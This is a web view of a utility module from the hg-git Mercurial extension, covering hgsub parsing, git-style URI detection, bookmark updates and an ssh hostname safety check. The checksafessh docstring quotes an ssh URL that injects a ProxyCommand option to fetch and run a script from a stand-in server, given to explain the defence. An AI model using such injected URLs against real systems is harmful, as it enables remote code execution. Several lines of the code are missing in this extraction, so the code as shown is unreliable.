view hggit/ @ 1102:93cb29247d61

exchange: check for remote refs to determine if we're cloning The exchange.pull wrapper function was checking whether any paths were configured yet as a proxy to determine whether we're doing the initial clone or a subsequent pull. Core hg @ bdae51a83dfb (released in 4.5) now sets the 'default' path on the ui object before exchange.pull is called, but we can check a bit more directly by checking if we have any remote refs yet. This is the same as a check we do in GitHandler.fetch_pack().
author Kevin Bullock <>
date Sat, 03 Feb 2018 14:54:35 -0600
parents c35751c248c3
children 21264429a8d4
line wrap: on
line source

"""Compatibility functions for old Mercurial versions and other utility
import re
import urllib

    from collections import OrderedDict
except ImportError:
    from ordereddict import OrderedDict

from dulwich import errors
from mercurial.i18n import _
from mercurial import (
    lock as lockmod,
    util as hgutil,

gitschemes = ('git', 'git+ssh', 'git+http', 'git+https')

def parse_hgsub(lines):
    """Fills OrderedDict with hgsub file content passed as list of lines"""
    rv = OrderedDict()
    for l in lines:
        ls = l.strip()
        if not ls or ls[0] == '#':
        name, value = l.split('=', 1)
        rv[name.strip()] = value.strip()
    return rv

def serialize_hgsub(data):
    """Produces a string from OrderedDict hgsub content"""
    return ''.join(['%s = %s\n' % (n, v) for n, v in data.iteritems()])

def parse_hgsubstate(lines):
    """Fills OrderedDict with hgsubtate file content passed as list of lines"""
    rv = OrderedDict()
    for l in lines:
        ls = l.strip()
        if not ls or ls[0] == '#':
        value, name = l.split(' ', 1)
        rv[name.strip()] = value.strip()
    return rv

def serialize_hgsubstate(data):
    """Produces a string from OrderedDict hgsubstate content"""
    return ''.join(['%s %s\n' % (data[n], n) for n in sorted(data)])

def transform_notgit(f):
    '''use as a decorator around functions that call into dulwich'''
    def inner(*args, **kwargs):
            return f(*args, **kwargs)
        except errors.NotGitRepository:
            raise hgutil.Abort('not a git repository')
    return inner

def isgitsshuri(uri):
    """Method that returns True if a uri looks like git-style uri


    >>> print isgitsshuri('')
    >>> print isgitsshuri('')
    >>> print isgitsshuri('')
    >>> print isgitsshuri('')
    >>> print isgitsshuri('git@')
    >>> print isgitsshuri('git@[2001:db8::1]:repository.git')
    for scheme in gitschemes:
        if uri.startswith('%s://' % scheme):
            return False

    if uri.startswith('http:') or uri.startswith('https:'):
        return False

    m = re.match(r'(?:.+@)*([\[]?[\w\d\.\:\-]+[\]]?):(.*)', uri)
    if m:
        # here we're being fairly conservative about what we consider to be git
        # urls
        giturl, repopath = m.groups()
        # definitely a git repo
        if repopath.endswith('.git'):
            return True
        # use a simple regex to check if it is a fqdn regex
        fqdn_re = (r'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}'
        if re.match(fqdn_re, giturl):
            return True
    return False

def updatebookmarks(repo, changes, name='git_handler'):
    """abstract writing bookmarks for backwards compatibility"""
    bms = repo._bookmarks
    tr = lock = wlock = None
        wlock = repo.wlock()
        lock = repo.lock()
        tr = repo.transaction(name)
        if hgutil.safehasattr(bms, 'applychanges'):
            # applychanges was added in mercurial 4.3
            bms.applychanges(repo, tr, changes)
            for name, node in changes:
                if node is None:
                    del bms[name]
                    bms[name] = node
            if hgutil.safehasattr(bms, 'recordchange'):
                # recordchange was added in mercurial 3.2
        lockmod.release(tr, lock, wlock)

def checksafessh(host):
    """check if a hostname is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the

    Raises an error.Abort when the url is unsafe.
    host = urllib.unquote(host)
    if host.startswith('-'):
        raise error.Abort(_('potentially unsafe hostname: %r') %